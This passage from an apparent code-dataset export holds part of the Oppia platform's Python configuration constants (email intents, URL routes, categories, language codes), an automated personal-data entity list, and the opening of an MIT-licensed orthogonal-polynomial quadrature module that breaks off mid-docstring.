+REQUIRE_EMAIL_ON_MODERATOR_ACTION = False +# Whether to allow custom event reporting to Google Analytics. +CAN_SEND_ANALYTICS_EVENTS = False +# Timespan in minutes before allowing duplicate emails. +DUPLICATE_EMAIL_INTERVAL_MINS = 2 +# Number of digits after decimal to which the average ratings value in the +# dashboard is rounded off to. +AVERAGE_RATINGS_DASHBOARD_PRECISION = 2 + +EMAIL_INTENT_SIGNUP = 'signup' +EMAIL_INTENT_DAILY_BATCH = 'daily_batch' +EMAIL_INTENT_EDITOR_ROLE_NOTIFICATION = 'editor_role_notification' +EMAIL_INTENT_FEEDBACK_MESSAGE_NOTIFICATION = 'feedback_message_notification' +EMAIL_INTENT_SUGGESTION_NOTIFICATION = 'suggestion_notification' +EMAIL_INTENT_REPORT_BAD_CONTENT = 'report_bad_content' +EMAIL_INTENT_MARKETING = 'marketing' +EMAIL_INTENT_PUBLICIZE_EXPLORATION = 'publicize_exploration' +EMAIL_INTENT_UNPUBLISH_EXPLORATION = 'unpublish_exploration' +EMAIL_INTENT_DELETE_EXPLORATION = 'delete_exploration' + +MODERATOR_ACTION_PUBLICIZE_EXPLORATION = 'publicize_exploration' +MODERATOR_ACTION_UNPUBLISH_EXPLORATION = 'unpublish_exploration' +DEFAULT_SALUTATION_HTML_FN = ( + lambda recipient_username: 'Hi %s,' % recipient_username) +DEFAULT_SIGNOFF_HTML_FN = ( + lambda sender_username: ( + 'Thanks!
    %s (Oppia moderator)' % sender_username)) + +VALID_MODERATOR_ACTIONS = { + MODERATOR_ACTION_PUBLICIZE_EXPLORATION: { + 'email_config': 'publicize_exploration_email_html_body', + 'email_subject_fn': ( + lambda exp_title: ( + 'Your Oppia exploration ""%s"" has been featured!' % exp_title)), + 'email_intent': EMAIL_INTENT_PUBLICIZE_EXPLORATION, + 'email_salutation_html_fn': DEFAULT_SALUTATION_HTML_FN, + 'email_signoff_html_fn': DEFAULT_SIGNOFF_HTML_FN, + }, + MODERATOR_ACTION_UNPUBLISH_EXPLORATION: { + 'email_config': 'unpublish_exploration_email_html_body', + 'email_subject_fn': ( + lambda exp_title: ( + 'Your Oppia exploration ""%s"" has been unpublished' % exp_title) + ), + 'email_intent': 'unpublish_exploration', + 'email_salutation_html_fn': DEFAULT_SALUTATION_HTML_FN, + 'email_signoff_html_fn': DEFAULT_SIGNOFF_HTML_FN, + }, +} + +# Panel properties and other constants for the default skin. +GADGET_PANEL_AXIS_HORIZONTAL = 'horizontal' +PANELS_PROPERTIES = { + 'bottom': { + 'width': 350, + 'height': 100, + 'stackable_axis': GADGET_PANEL_AXIS_HORIZONTAL, + 'pixels_between_gadgets': 80, + 'max_gadgets': 1 + } +} + +# When the site terms were last updated, in UTC. +REGISTRATION_PAGE_LAST_UPDATED_UTC = datetime.datetime(2015, 10, 14, 2, 40, 0) + +# Format of string for dashboard statistics logs. +# NOTE TO DEVELOPERS: This format should not be changed, since it is used in +# the existing storage models for UserStatsModel. +DASHBOARD_STATS_DATETIME_STRING_FORMAT = '%Y-%m-%d' + +# The maximum size of an uploaded file, in bytes. +MAX_FILE_SIZE_BYTES = 1048576 + +# The default language code for an exploration. +DEFAULT_LANGUAGE_CODE = 'en' + +# The id of the default skin. +# TODO(sll): Deprecate this; it is no longer used. +DEFAULT_SKIN_ID = 'conversation_v1' + +# The prefix for an 'accepted suggestion' commit message. +COMMIT_MESSAGE_ACCEPTED_SUGGESTION_PREFIX = 'Accepted suggestion by' + +# User id and username for exploration migration bot. Commits made by this bot +# are not reflected in the exploration summary models, but are recorded in the +# exploration commit log. +MIGRATION_BOT_USER_ID = 'OppiaMigrationBot' +MIGRATION_BOT_USERNAME = 'OppiaMigrationBot' + +# Ids and locations of the permitted extensions. +ALLOWED_RTE_EXTENSIONS = { + 'Collapsible': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Collapsible') + }, + 'Image': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Image') + }, + 'Link': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Link') + }, + 'Math': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Math') + }, + 'Tabs': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Tabs') + }, + 'Video': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Video') + }, +} + +# These categories and interactions are displayed in the order in which they +# appear in the interaction selector. +ALLOWED_INTERACTION_CATEGORIES = [{ + 'name': 'General', + 'interaction_ids': [ + 'Continue', + 'EndExploration', + 'ImageClickInput', + 'ItemSelectionInput', + 'MultipleChoiceInput', + 'TextInput' + ], +}, { + 'name': 'Math', + 'interaction_ids': [ + 'GraphInput', + 'LogicProof', + 'NumericInput', + 'SetInput', + 'MathExpressionInput', + ] +}, { + 'name': 'Programming', + 'interaction_ids': [ + 'CodeRepl', + 'PencilCodeEditor', + ], +}, { + 'name': 'Music', + 'interaction_ids': [ + 'MusicNotesInput' + ], +}, { + 'name': 'Geography', + 'interaction_ids': [ + 'InteractiveMap' + ], +}] + +ALLOWED_GADGETS = { + 'ScoreBar': { + 'dir': os.path.join(GADGETS_DIR, 'ScoreBar') + }, +} + +# Gadgets subclasses must specify a valid panel option from this list. +ALLOWED_GADGET_PANELS = ['bottom'] + +# Demo explorations to load through the admin panel. The id assigned to each +# exploration is based on the key of the exploration in this dict, so ensure it +# doesn't change once it's in the list. Only integer-based indices should be +# used in this list, as it maintains backward compatibility with how demo +# explorations used to be assigned IDs. The value of each entry in this dict is +# either a YAML file or a directory (depending on whether it ends in .yaml). +# These explorations can be found under data/explorations. +DEMO_EXPLORATIONS = { + u'0': 'welcome.yaml', + u'1': 'multiples.yaml', + u'2': 'binary_search', + u'3': 'root_linear_coefficient_theorem.yaml', + u'4': 'three_balls', + # TODO(bhenning): Replace demo exploration '5' with a new exploration + # described in #1376. + u'6': 'boot_verbs.yaml', + u'7': 'hola.yaml', + u'8': 'adventure.yaml', + u'9': 'pitch_perfect.yaml', + u'10': 'test_interactions', + u'11': 'modeling_graphs', + u'12': 'protractor_test_1.yaml', + u'13': 'solar_system', + u'14': 'about_oppia.yaml', + u'15': 'classifier_demo_exploration.yaml', + u'16': 'all_interactions', +} + +DEMO_COLLECTIONS = { + u'0': 'welcome_to_collections.yaml' +} + +# IDs of explorations which should not be displayable in either the learner or +# editor views. +DISABLED_EXPLORATION_IDS = ['5'] + +# Google Group embed URL for the Forum page. +EMBEDDED_GOOGLE_GROUP_URL = ( + 'https://groups.google.com/forum/embed/?place=forum/oppia') + +# Whether to allow YAML file uploads. +ALLOW_YAML_FILE_UPLOAD = False + +# Prefix for all taskqueue-related URLs. +TASKQUEUE_URL_PREFIX = '/task' +TASK_URL_FEEDBACK_MESSAGE_EMAILS = ( + '%s/email/batchfeedbackmessageemailhandler' % TASKQUEUE_URL_PREFIX) +TASK_URL_FEEDBACK_STATUS_EMAILS = ( + '%s/email/feedbackthreadstatuschangeemailhandler' % TASKQUEUE_URL_PREFIX) +TASK_URL_FLAG_EXPLORATION_EMAILS = ( + '%s/email/flagexplorationemailhandler' % TASKQUEUE_URL_PREFIX) +TASK_URL_INSTANT_FEEDBACK_EMAILS = ( + '%s/email/instantfeedbackmessageemailhandler' % TASKQUEUE_URL_PREFIX) +TASK_URL_SUGGESTION_EMAILS = ( + '%s/email/suggestionemailhandler' % TASKQUEUE_URL_PREFIX) + +# TODO(sll): Add all other URLs here. +ADMIN_URL = '/admin' +COLLECTION_DATA_URL_PREFIX = '/collection_handler/data' +EDITABLE_COLLECTION_DATA_URL_PREFIX = '/collection_editor_handler/data' +COLLECTION_RIGHTS_PREFIX = '/collection_editor_handler/rights' +COLLECTION_EDITOR_URL_PREFIX = '/collection_editor/create' +COLLECTION_URL_PREFIX = '/collection' +DASHBOARD_URL = '/dashboard' +DASHBOARD_CREATE_MODE_URL = '%s?mode=create' % DASHBOARD_URL +DASHBOARD_DATA_URL = '/dashboardhandler/data' +DASHBOARD_EXPLORATION_STATS_PREFIX = '/dashboardhandler/explorationstats' +EDITOR_URL_PREFIX = '/create' +EXPLORATION_DATA_PREFIX = '/createhandler/data' +EXPLORATION_INIT_URL_PREFIX = '/explorehandler/init' +EXPLORATION_METADATA_SEARCH_URL = '/exploration/metadata_search' +EXPLORATION_RIGHTS_PREFIX = '/createhandler/rights' +EXPLORATION_SUMMARIES_DATA_URL = '/explorationsummarieshandler/data' +EXPLORATION_URL_PREFIX = '/explore' +EXPLORATION_URL_EMBED_PREFIX = '/embed/exploration' +FEEDBACK_STATS_URL_PREFIX = '/feedbackstatshandler' +FEEDBACK_THREAD_URL_PREFIX = '/threadhandler' +FEEDBACK_THREADLIST_URL_PREFIX = '/threadlisthandler' +FEEDBACK_THREAD_VIEW_EVENT_URL = '/feedbackhandler/thread_view_event' +FLAG_EXPLORATION_URL_PREFIX = '/flagexplorationhandler' +LIBRARY_GROUP_DATA_URL = '/librarygrouphandler' +LIBRARY_INDEX_URL = '/library' +LIBRARY_INDEX_DATA_URL = '/libraryindexhandler' +LIBRARY_RECENTLY_PUBLISHED_URL = '/library/recently_published' +LIBRARY_SEARCH_URL = '/search/find' +LIBRARY_SEARCH_DATA_URL = '/searchhandler/data' +LIBRARY_TOP_RATED_URL = '/library/top_rated' +NEW_COLLECTION_URL = '/collection_editor_handler/create_new' +NEW_EXPLORATION_URL = '/contributehandler/create_new' +RECENT_COMMITS_DATA_URL = '/recentcommitshandler/recent_commits' +RECENT_FEEDBACK_MESSAGES_DATA_URL = '/recent_feedback_messages' +ROBOTS_TXT_URL = '/robots.txt' +SITE_FEEDBACK_FORM_URL = '' +SITE_LANGUAGE_DATA_URL = '/save_site_language' +SIGNUP_DATA_URL = '/signuphandler/data' +SIGNUP_URL = '/signup' +SPLASH_URL = '/splash' +SUGGESTION_ACTION_URL_PREFIX = '/suggestionactionhandler' +SUGGESTION_LIST_URL_PREFIX = '/suggestionlisthandler' +SUGGESTION_URL_PREFIX = '/suggestionhandler' +UPLOAD_EXPLORATION_URL = '/contributehandler/upload' +USERNAME_CHECK_DATA_URL = '/usernamehandler/data' + +NAV_MODE_ABOUT = 'about' +NAV_MODE_BLOG = 'blog' +NAV_MODE_COLLECTION = 'collection' +NAV_MODE_CONTACT = 'contact' +NAV_MODE_CREATE = 'create' +NAV_MODE_DASHBOARD = 'dashboard' +NAV_MODE_DONATE = 'donate' +NAV_MODE_EXPLORE = 'explore' +NAV_MODE_LIBRARY = 'library' +NAV_MODE_PROFILE = 'profile' +NAV_MODE_SIGNUP = 'signup' +NAV_MODE_SPLASH = 'splash' +NAV_MODE_TEACH = 'teach' +NAV_MODE_THANKS = 'thanks' + +# Event types. +EVENT_TYPE_STATE_HIT = 'state_hit' +EVENT_TYPE_ANSWER_SUBMITTED = 'answer_submitted' +EVENT_TYPE_DEFAULT_ANSWER_RESOLVED = 'default_answer_resolved' +EVENT_TYPE_NEW_THREAD_CREATED = 'feedback_thread_created' +EVENT_TYPE_THREAD_STATUS_CHANGED = 'feedback_thread_status_changed' +EVENT_TYPE_RATE_EXPLORATION = 'rate_exploration' +# The values for these event types should be left as-is for backwards +# compatibility. +EVENT_TYPE_START_EXPLORATION = 'start' +EVENT_TYPE_MAYBE_LEAVE_EXPLORATION = 'leave' +EVENT_TYPE_COMPLETE_EXPLORATION = 'complete' + +ACTIVITY_STATUS_PRIVATE = 'private' +ACTIVITY_STATUS_PUBLIC = 'public' +ACTIVITY_STATUS_PUBLICIZED = 'publicized' + +# Play type constants +PLAY_TYPE_PLAYTEST = 'playtest' +PLAY_TYPE_NORMAL = 'normal' + +# Predefined commit messages. +COMMIT_MESSAGE_EXPLORATION_DELETED = 'Exploration deleted.' +COMMIT_MESSAGE_COLLECTION_DELETED = 'Collection deleted.' + +# Unfinished features. +SHOW_TRAINABLE_UNRESOLVED_ANSWERS = False +# Number of unresolved answers to be displayed in the dashboard for each +# exploration. +TOP_UNRESOLVED_ANSWERS_COUNT_DASHBOARD = 3 +# Number of open feedback to be displayed in the dashboard for each exploration. +OPEN_FEEDBACK_COUNT_DASHBOARD = 3 +# NOTE TO DEVELOPERS: This should be synchronized with base.js +ENABLE_STRING_CLASSIFIER = False +SHOW_COLLECTION_NAVIGATION_TAB_HISTORY = False +SHOW_COLLECTION_NAVIGATION_TAB_STATS = False + +# Output formats of downloaded explorations. +OUTPUT_FORMAT_JSON = 'json' +OUTPUT_FORMAT_ZIP = 'zip' + +# Types of updates shown in the 'recent updates' table in the dashboard page. +UPDATE_TYPE_EXPLORATION_COMMIT = 'exploration_commit' +UPDATE_TYPE_COLLECTION_COMMIT = 'collection_commit' +UPDATE_TYPE_FEEDBACK_MESSAGE = 'feedback_thread' + +# Possible values for user query status. +# Valid status transitions are: processing --> completed --> archived +# Or processing --> failed. +USER_QUERY_STATUS_PROCESSING = 'processing' +USER_QUERY_STATUS_COMPLETED = 'completed' +USER_QUERY_STATUS_ARCHIVED = 'archived' +USER_QUERY_STATUS_FAILED = 'failed' + +# The time difference between which to consider two login events ""close"". This +# is taken to be 12 hours. +PROXIMAL_TIMEDELTA_SECS = 12 * 60 * 60 + +DEFAULT_COLOR = '#a33f40' +DEFAULT_THUMBNAIL_ICON = 'Lightbulb' + +# List of supported default categories. For now, each category has a specific +# color associated with it. Each category also has a thumbnail icon whose +# filename is ""{{CategoryName}}.svg"". +CATEGORIES_TO_COLORS = { + 'Mathematics': '#cd672b', + 'Algebra': '#cd672b', + 'Arithmetic': '#d68453', + 'Calculus': '#b86330', + 'Logic': '#d68453', + 'Combinatorics': '#cf5935', + 'Graph Theory': '#cf5935', + 'Probability': '#cf5935', + 'Statistics': '#cd672b', + 'Geometry': '#d46949', + 'Trigonometry': '#d46949', + + 'Algorithms': '#d0982a', + 'Computing': '#bb8b2f', + 'Programming': '#d9aa53', + + 'Astronomy': '#879d6c', + 'Biology': '#97a766', + 'Chemistry': '#aab883', + 'Engineering': '#8b9862', + 'Environment': '#aba86d', + 'Medicine': '#97a766', + 'Physics': '#879d6c', + + 'Architecture': '#6e3466', + 'Art': '#895a83', + 'Music': '#6a3862', + 'Philosophy': '#613968', + 'Poetry': '#7f507f', + + 'English': '#193a69', + 'Languages': '#1b4174', + 'Latin': '#3d5a89', + 'Reading': '#193a69', + 'Spanish': '#405185', + 'Gaulish': '#1b4174', + + 'Business': '#387163', + 'Economics': '#5d8b7f', + 'Geography': '#3c6d62', + 'Government': '#538270', + 'History': '#3d6b52', + 'Law': '#538270', + + 'Education': '#942e20', + 'Puzzles': '#a8554a', + 'Sport': '#893327', + 'Welcome': '#992a2b', +} + +# Types of activities that can be created with Oppia. +ACTIVITY_TYPE_EXPLORATION = 'exploration' +ACTIVITY_TYPE_COLLECTION = 'collection' +ALL_ACTIVITY_TYPES = [ACTIVITY_TYPE_EXPLORATION, ACTIVITY_TYPE_COLLECTION] + +# A sorted list of default categories for which icons and background colours +# exist. +ALL_CATEGORIES = sorted(CATEGORIES_TO_COLORS.keys()) + +# These categories are shown in the library navbar. +SEARCH_DROPDOWN_CATEGORIES = sorted([ + 'Mathematics', + 'Statistics', + 'Algorithms', + 'Programming', + 'Biology', + 'Chemistry', + 'Physics', + 'Medicine', + 'English', + 'Architecture', + 'Art', + 'Music', + 'Reading', + 'Business', + 'Economics', + 'Geography', + 'History', +]) + +# The i18n id for the header of the ""Featured Activities"" category in the +# library index page. +LIBRARY_CATEGORY_FEATURED_ACTIVITIES = 'I18N_LIBRARY_GROUPS_FEATURED_ACTIVITIES' +# The i18n id for the header of the ""Top Rated Explorations"" category in the +# library index page. +LIBRARY_CATEGORY_TOP_RATED_EXPLORATIONS = ( + 'I18N_LIBRARY_GROUPS_TOP_RATED_EXPLORATIONS') +# The i18n id for the header of the ""Recently Published"" category in the +# library index page. +LIBRARY_CATEGORY_RECENTLY_PUBLISHED = 'I18N_LIBRARY_GROUPS_RECENTLY_PUBLISHED' + +# The group name that appears at the end of the url for the recently published +# page. +LIBRARY_GROUP_RECENTLY_PUBLISHED = 'recently_published' +# The group name that appears at the end of the url for the top rated page. +LIBRARY_GROUP_TOP_RATED = 'top_rated' + +# NOTE TO DEVELOPERS: The LIBRARY_PAGE_MODE constants defined below should have +# the same value as the ones defined in LIBRARY_PAGE_MODES in Library.js. For +# example LIBRARY_PAGE_MODE_GROUP should have the same value as +# LIBRARY_PAGE_MODES.GROUP. +# Page mode for the group pages such as top rated and recently published +# explorations. +LIBRARY_PAGE_MODE_GROUP = 'group' +# Page mode for the main library page. +LIBRARY_PAGE_MODE_INDEX = 'index' +# Page mode for the search results page. +LIBRARY_PAGE_MODE_SEARCH = 'search' + +# List of supported language codes. Each description has a +# parenthetical part that may be stripped out to give a shorter +# description. +ALL_LANGUAGE_CODES = [{ + 'code': 'en', 'description': u'English', +}, { + 'code': 'ar', 'description': u'العربية (Arabic)', +}, { + 'code': 'bg', 'description': u'български (Bulgarian)', +}, { + 'code': 'ca', 'description': u'català (Catalan)', +}, { + 'code': 'zh', 'description': u'中文 (Chinese)', +}, { + 'code': 'hr', 'description': u'hrvatski (Croatian)', +}, { + 'code': 'cs', 'description': u'čeština (Czech)', +}, { + 'code': 'da', 'description': u'dansk (Danish)', +}, { + 'code': 'nl', 'description': u'Nederlands (Dutch)', +}, { + 'code': 'tl', 'description': u'Filipino (Filipino)', +}, { + 'code': 'fi', 'description': u'suomi (Finnish)', +}, { + 'code': 'fr', 'description': u'français (French)', +}, { + 'code': 'de', 'description': u'Deutsch (German)', +}, { + 'code': 'el', 'description': u'ελληνικά (Greek)', +}, { + 'code': 'he', 'description': u'עברית (Hebrew)', +}, { + 'code': 'hi', 'description': u'हिन्दी (Hindi)', +}, { + 'code': 'hu', 'description': u'magyar (Hungarian)', +}, { + 'code': 'id', 'description': u'Bahasa Indonesia (Indonesian)', +}, { + 'code': 'it', 'description': u'italiano (Italian)', +}, { + 'code': 'ja', 'description': u'日本語 (Japanese)', +}, { + 'code': 'ko', 'description': u'한국어 (Korean)', +}, { + 'code': 'lv', 'description': u'latviešu (Latvian)', +}, { + 'code': 'lt', 'description': u'lietuvių (Lithuanian)', +}, { + 'code': 'no', 'description': u'Norsk (Norwegian)', +}, { + 'code': 'fa', 'description': u'فارسی (Persian)', +}, { + 'code': 'pl', 'description': u'polski (Polish)', +}, { + 'code': 'pt', 'description': u'português (Portuguese)', +}, { + 'code': 'ro', 'description': u'română (Romanian)', +}, { + 'code': 'ru', 'description': u'русский (Russian)', +}, { + 'code': 'sr', 'description': u'српски (Serbian)', +}, { + 'code': 'sk', 'description': u'slovenčina (Slovak)', +}, { + 'code': 'sl', 'description': u'slovenščina (Slovenian)', +}, { + 'code': 'es', 'description': u'español (Spanish)', +}, { + 'code': 'sv', 'description': u'svenska (Swedish)', +}, { + 'code': 'th', 'description': u'ภาษาไทย (Thai)', +}, { + 'code': 'tr', 'description': u'Türkçe (Turkish)', +}, { + 'code': 'uk', 'description': u'українська (Ukrainian)', +}, { + 'code': 'vi', 'description': u'Tiếng Việt (Vietnamese)', +}] + +# Defaults for topic similarities +DEFAULT_TOPIC_SIMILARITY = 0.5 +SAME_TOPIC_SIMILARITY = 1.0 + +# NOTE TO DEVELOPERS: While adding another language, please ensure that the +# languages are in alphabetical order. +SUPPORTED_SITE_LANGUAGES = [{ + 'id': 'id', + 'text': 'Bahasa Indonesia' +}, { + 'id': 'en', + 'text': 'English' +}, { + 'id': 'es', + 'text': 'Español' +}, { + 'id': 'pt', + 'text': 'Português' +}, { + 'id': 'pt-br', + 'text': 'Português (Brasil)' +}, { + 'id': 'vi', + 'text': 'Tiếng Việt' +}, { + 'id': 'hi', + 'text': 'हिन्दी' +}] +SYSTEM_USERNAMES = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME] +SYSTEM_USER_IDS = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME] + +# The following are all page descriptions for the meta tag. +ABOUT_PAGE_DESCRIPTION = ( + 'Oppia is an open source learning platform that connects a community of ' + 'teachers and learners. You can use this site to create 1-1 learning ' + 'scenarios for others.') +BLOG_PAGE_DESCRIPTION = ( + 'Keep up to date with Oppia news and updates via our blog.') +CONTACT_PAGE_DESCRIPTION = ( + 'Contact the Oppia team, submit feedback, and learn how to get involved ' + 'with the Oppia project.') +CREATE_PAGE_DESCRIPTION = ( + 'Help others learn new things. Create lessons through explorations and ' + 'share your knowledge with the community.') +DASHBOARD_PAGE_DESCRIPTION = ( + 'Keep track of the lessons you have created, as well as feedback from ' + 'learners.') +DONATE_PAGE_DESCRIPTION = ( + 'Donate to The Oppia Foundation.') +FORUM_PAGE_DESCRIPTION = ( + 'Engage with the Oppia community by discussing questions, bugs and ' + 'explorations in the forum.') +LIBRARY_GROUP_PAGE_DESCRIPTION = ( + 'Discover top-rated or recently-published explorations on Oppia. Learn ' + 'from these explorations or help improve an existing one for the ' + 'community.') +LIBRARY_PAGE_DESCRIPTION = ( + 'Looking to learn something new? Find explorations created by professors, ' + 'teachers and Oppia users in a subject you\'re interested in, and start ' + 'exploring!') +PREFERENCES_PAGE_DESCRIPTION = ( + 'Change your Oppia profile settings and preferences') +SEARCH_PAGE_DESCRIPTION = ( + 'Discover a new exploration to learn from, or help improve an existing ' + 'one for the community.') +SIGNUP_PAGE_DESCRIPTION = ( + 'Sign up for Oppia and begin exploring a new subject.') +SPLASH_PAGE_DESCRIPTION = ( + 'Oppia is a free site for sharing knowledge via interactive lessons ' + 'called \'explorations\'. Learn from user-created explorations, or teach ' + 'and create your own.') +TEACH_PAGE_DESCRIPTION = ( + 'The Oppia library is full of user-created lessons called \'explorations\'.' + ' Read about how to participate in the community and begin creating ' + 'explorations.') +TERMS_PAGE_DESCRIPTION = ( + 'Oppia is a 501(c)(3) registered non-profit open-source e-learning ' + 'platform. Learn about our terms and conditions for creating and ' + 'distributing learning material.') +THANKS_PAGE_DESCRIPTION = ( + 'Thank you for donating to The Oppia Foundation.') +SITE_NAME = 'Oppia.org' + +# The type of the response returned by a handler when an exception is raised. +HANDLER_TYPE_HTML = 'html' +HANDLER_TYPE_JSON = 'json' +",30534,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', ""https://groups.google.com/forum/embed/?place=forum/oppia'""], ['DATE_TIME', '2014'], ['PERSON', 'IS_MINIFIED'], ['PERSON', 'NUMBER_OF_TOP_RATED_EXPLORATIONS_FOR_LIBRARY_PAGE'], ['PERSON', 'ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS'], ['PERSON', ""r'^[A-Za-z0-9]+$""], ['PERSON', ""-Za-z]+)*$'""], ['PERSON', 'TODO'], ['PERSON', 'Committer'], ['PERSON', 'email_manager.py'], ['PERSON', 'DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE = True'], ['DATE_TIME', 'minutes'], ['PERSON', 'EMAIL_INTENT_EDITOR_ROLE_NOTIFICATION'], ['PERSON', ""EMAIL_INTENT_FEEDBACK_MESSAGE_NOTIFICATION = '""], ['PERSON', 'VALID_MODERATOR_ACTIONS'], ['PERSON', 'GADGET_PANEL_AXIS_HORIZONTAL'], ['DATE_TIME', '10'], ['DATE_TIME', '14'], ['DATE_TIME', '40'], ['LOCATION', 'UserStatsModel'], ['DATE_TIME', ""OppiaMigrationBot'""], ['URL', 'os.path.jo'], ['LOCATION', 'ALLOWED_INTERACTION_CATEGORIES'], ['PERSON', 'MultipleChoiceInput'], ['PERSON', 'SetInput'], ['PERSON', 'EDITOR_URL_PREFIX'], ['NRP', 'EXPLORATION_METADATA_SEARCH_URL'], ['PERSON', 'SUGGESTION_URL_PREFIX'], ['PERSON', 'NAV_MODE_COLLECTION'], ['LOCATION', 'NAV_MODE_LIBRARY'], ['PERSON', 'EVENT_TYPE_DEFAULT_ANSWER_RESOLVED'], ['PERSON', ""EVENT_TYPE_THREAD_STATUS_CHANGED = '""], ['PERSON', 'EVENT_TYPE_MAYBE_LEAVE_EXPLORATION'], ['PERSON', 'USER_QUERY_STATUS_ARCHIVED'], ['DATE_TIME', '12 hours'], ['PERSON', 'Lightbulb'], ['DATE_TIME', ""8b9862'""], ['DATE_TIME', ""405185'""], ['PERSON', ""u'български""], ['NRP', 'Bulgarian'], ['NRP', 'Chinese'], ['NRP', 'Croatian'], ['NRP', 'Czech'], ['NRP', 'Danish'], ['NRP', 'Dutch'], ['PERSON', ""u'Filipino""], ['NRP', 'Finnish'], ['NRP', 'French'], ['NRP', 'German'], ['NRP', 'Greek'], ['PERSON', ""u'magyar""], ['NRP', 'Hungarian'], ['LOCATION', 'Indonesia'], ['NRP', 'Indonesian'], ['NRP', 'Italian'], ['NRP', 'Japanese'], ['PERSON', 'ko'], ['NRP', 'Korean'], ['NRP', 'Latvian'], ['NRP', 'Lithuanian'], ['NRP', 'Norwegian'], ['NRP', 'Persian'], ['NRP', 'Polish'], ['NRP', 'Portuguese'], ['PERSON', ""u'română""], ['NRP', 'Romanian'], ['NRP', 'Russian'], ['NRP', 'Serbian'], ['PERSON', ""u'slovenčina""], ['NRP', 'Slovak'], ['NRP', 'Slovenian'], ['NRP', 'Spanish'], ['DATE_TIME', ""u'svenska""], ['NRP', 'Swedish'], ['NRP', 'Thai'], ['NRP', 'Turkish'], ['NRP', 'Ukrainian'], ['NRP', 'Vietnamese'], ['LOCATION', 'Indonesia'], ['PERSON', 'Tiếng'], ['PERSON', 'TEACH_PAGE_DESCRIPTION'], ['PERSON', 'THANKS_PAGE_DESCRIPTION'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', 'os.environ.ge'], ['URL', 'os.environ.ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.ge'], ['URL', 'services.py'], ['URL', 'copy.de'], ['URL', 'mailgun.org'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'manager.py'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'COLORS.ke'], ['URL', 'MODES.GR'], ['URL', 'Oppia.org']]" +5,""""""" + orthopoly.py - A suite of functions for generating orthogonal polynomials + and quadrature rules. + + Copyright (c) 2014 Greg von Winckel + All rights reserved. + + Permission is hereby granted, free of charge, to any person obtaining + a copy of this software and associated documentation files (the + ""Software""), to deal in the Software without restriction, including + without limitation the rights to use, copy, modify, merge, publish, + distribute, sublicense, and/or sell copies of the Software, and to + permit persons to whom the Software is furnished to do so, subject to + the following conditions: + + The above copyright notice and this permission notice shall be + included in all copies or substantial portions of the Software. + + THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, + EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. + IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY + CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, + TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE + SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + + Last updated on Wed Jan 1 14:29:25 MST 2014 + + Modified by David A. Ham (dummy@email.com), 2016 +"""""" + +import numpy as np +from functools import reduce +from math import gamma + + +def gauss(alpha, beta): + """""" + Compute the Gauss nodes and weights from the recursion + coefficients associated with a set of orthogonal polynomials + + Inputs: + alpha - recursion coefficients + beta - recursion coefficients + + Outputs: + x - quadrature nodes + w - quadrature weights + + Adapted from the MATLAB code by Walter Gautschi + http://www.cs.purdue.edu/archives/2002/wxg/codes/gauss.m + """""" + + from numpy.linalg import eigh + + A = np.diag(np.sqrt(beta)[1:], 1) + np.diag(alpha) + x, V = eigh(A, ""U"") + + w = beta[0] * np.real(np.power(V[0, :], 2)) + return x, w + + +def lobatto(alpha, beta, xl1, xl2): + """""" + Compute the Lobatto nodes and weights with the preassigned + nodea xl1,xl2 + + Inputs: + alpha - recursion coefficients + beta - recursion coefficients + xl1 - assigned node location + xl2 - assigned node location + + Outputs: + x - quadrature nodes + w - quadrature weights + + Based on the section 7 of the paper + ""Some modified matrix eigenvalue problems"" + by Gene Golub, SIAM Review Vol 15, No. 2, April 1973, pp.318--334 + """""" + from numpy.linalg import solve + n = len(alpha) - 1 + en = np.zeros(n) + en[-1] = 1 + A1 = np.vstack((np.sqrt(beta), alpha - xl1)) + J1 = np.diag(A1[0, 1:-1], 1) + np.diag(A1[1, 1:]) + np.diag(A1[0, 1:-1], -1) + A2 = np.vstack((np.sqrt(beta), alpha - xl2)) + J2 = np.diag(A2[0, 1:-1], 1) + np.diag(A2[1, 1:]) + np.diag(A2[0, 1:-1], -1) + g1 = solve(J1, en) + g2 = solve(J2, en) + C = np.array(((1, -g1[-1]), (1, -g2[-1]))) + xl = np.array((xl1, xl2)) + ab = solve(C, xl) + + alphal = alpha + alphal[-1] = ab[0] + betal = beta + betal[-1] = ab[1] + x, w = gauss(alphal, betal) + return x, w + + +def rec_jacobi(N, a, b): + """""" + Generate the recursion coefficients alpha_k, beta_k + + P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x) + + for the Jacobi polynomials which are orthogonal on [-1,1] + with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b] + + 